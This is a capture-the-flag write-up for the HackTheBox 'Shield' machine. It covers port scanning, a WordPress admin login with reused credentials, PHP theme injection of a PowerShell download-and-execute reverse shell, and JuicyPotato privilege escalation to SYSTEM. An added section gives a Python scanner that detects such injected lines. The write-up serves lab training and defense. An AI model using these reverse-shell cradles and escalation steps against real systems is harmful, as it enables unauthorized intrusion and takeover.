HackTheBox - Shield Writeup

SH∆FIQ∆IM∆N
July 21, 2021

Enumeration

  • Scan the top 1000 ports:

nmap -sC -sV -oN nmap/initial 10.10.10.29

  • The result:

nmap initial scan

  • Scan all ports:

nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.29

  • The result:

nmap allports scan

  • The full port scan shows the same result as the first one.
  • Open ports:
    • 80 / http
    • 3306 / mysql

WebPage

  • Just the default IIS page of Windows Server.

IIS default page

IIS default page

Gobuster

  • Using gobuster to find any hidden directories.
  • The result:

gobuster

WordPress

  • The result shows this server has WordPress installed.
  • As we know, the WordPress login path is /wp-admin.
  • Let's take a look.

Admin Login

  • Try to log in as admin with the credentials from the previous box, Vaccine.
  • Success.

wordpress admin

Foothold/Gaining Access

WordPress Theme Injection

  • Let's try to get a reverse shell by injecting code into the theme.
  • I'm gonna use the theme "GutenBooster".
    • The reverse shell script I'm gonna use is from Nishang.
  • Now, I'm gonna put the command in 404.php, which is the theme's 404 template.
  • Source

<?php
exec('powershell IEX(IWR http://10.10.16.13:8000/rev.ps1 -UseBasicParsing)')
?>

  • This command downloads the reverse shell script and executes it.

get shell

  • The reverse shell executed successfully.
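
A defender's counterpart to the theme injection above, added here as an example that is not part of the original writeup: a small Python scanner that walks a WordPress theme directory and flags template lines that hand a string to the OS (exec, system, ...), which is exactly what the injected 404.php relies on. The sample theme files are constructed; only the 404.php line mirrors the payload shown above, and the paths and function names are my own.

```python
import os
import re

# Constructed sample theme files (not taken from the box). Only the 404.php line
# mirrors the injected payload shown in this writeup; the other file is benign.
SAMPLE_THEME_FILES = {
    "gutenbooster/404.php": (
        "<?php\n"
        "exec('powershell IEX(IWR http://10.10.16.13:8000/rev.ps1 -UseBasicParsing)')\n"
        "?>"
    ),
    "gutenbooster/index.php": "<?php get_header(); ?>\n<h1><?php the_title(); ?></h1>",
}

# PHP functions that hand a string to the OS; a theme template has no reason to call them.
EXEC_FUNCS = re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Download-and-run PowerShell idioms like the IEX(IWR ...) cradle in the injected 404.php.
PS_CRADLE = re.compile(r"\b(powershell|IEX|Invoke-Expression|IWR|Invoke-WebRequest|DownloadString)\b", re.I)


def scan_theme_files(files):
    """Return [(path, line_no, reason)] for each line that looks like an injected
    command-execution backdoor. `files` maps a relative path to the file's contents."""
    findings = []
    for path, content in sorted(files.items()):
        for line_no, line in enumerate(content.splitlines(), start=1):
            if not EXEC_FUNCS.search(line):
                continue
            reason = "os command execution"
            if PS_CRADLE.search(line):
                reason += " + powershell download cradle"
            findings.append((path, line_no, reason))
    return findings


def scan_theme_dir(root):
    """Read every .php file under a real theme directory (e.g. wp-content/themes) and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_theme_files(files)


if __name__ == "__main__":
    for path, line_no, reason in scan_theme_files(SAMPLE_THEME_FILES):
        print(f"{path}:{line_no}: {reason}")
```

Matching is per line and will miss obfuscated payloads (base64, string concatenation), so treat it as a quick triage check alongside file-integrity monitoring of wp-content/themes rather than a complete control.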

SeImpersonatePrivilege

  • Every time you get a PowerShell reverse shell, make sure to run:

    whoami /all

  • The result:

SeImpersonatePrivilege token

  • Looks like SeImpersonatePrivilege is enabled.
  • We can escalate privileges using JuicyPotato.
  • Source
  • Download the binary to the local machine, then upload it to the victim machine with this command:

IWR http://10.10.16.34:8000/JuicyPotato.exe -outfile again_gimme.exe

  • Then run the binary.
  • The result:

juicy potato

Privilege Escalation

  • First, I'm gonna make a bat file with a PowerShell command in it.
  • I called the file yo_my.bat.
  • The command:
  • Source

powershell "(IEX(IWR http://10.10.16.34:8000/rev.ps1 -UseBasicParsing))"

POTATO

  • I'm gonna run again_gimme.exe again with these flags:

    ./again_gimme.exe -t * -p yo_my.bat -l 9902

  • The result:

juicy potato failed

  • It failed, so check the OS version and run it again with an explicit CLSID (-c):

check OS version

.\again_gimme.exe -t * -p yo_my.bat -l 9902 -c '{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}'

Summary

Make sure you're running nc to listen for the connection.
REMEMBER: the PowerShell command in the bat file downloads another reverse shell file called rev.ps1. In that file I'm listening on 9901. If you listen on a different port, change the port in that file.

  • The result:

shell as nt authority\system

  • We've got the root flag.

root flag

Conclusion

I've learned a lot today. Do not put any credentials on a machine that is exposed to attackers or otherwise not secure. Even if it happens, quickly change the password. I've also introduced a bunch of tools for Windows pentesting. Lastly, always update and patch the machine.

I had a fun time doing this machine and I hope you guys do too. Bye ;)